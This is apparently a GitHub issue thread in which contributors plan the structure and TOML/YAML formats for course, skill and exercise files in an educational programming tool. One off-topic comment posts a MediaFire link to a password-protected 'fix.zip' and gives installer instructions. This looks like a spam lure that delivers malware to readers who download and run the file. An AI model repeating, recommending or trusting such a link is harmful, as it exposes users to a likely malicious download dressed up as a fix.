### ISSUE TITLE
Feature: Define the structure and course/skills/exo formats

### ISSUE THREAD

**Issue by samuelroland** [plx-pdg/plx#60]
**Tasks**
- [ ] Inspect structure and formats on a dozen of *lings project (rustlings, cplings, golings, ...) and show examples in dedicated doc page
- [ ] Build 10 exos in a course example, skills file and course file
- [ ] Try 2 possibilities in TOML and YAML of a syntax for 2 exo types
- [ ] Document the final choice
- [ ] Make sure all existing structs can be filled with available info
- [ ] Convert locally 3 exos of various types for PRG1, PRG2, PCO, SYE, and POO to make sure it is possible to describe these existing exos
1. [ ] Write a spec for the structure and formats
1. [ ] Add examples exos inside `examples/full`

**Associated documentation**
1. [ ] Document the structure and syntax for teachers in a dedicated doc page

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AndreCostaaa** [comment]
Can probably be close when we merge #65
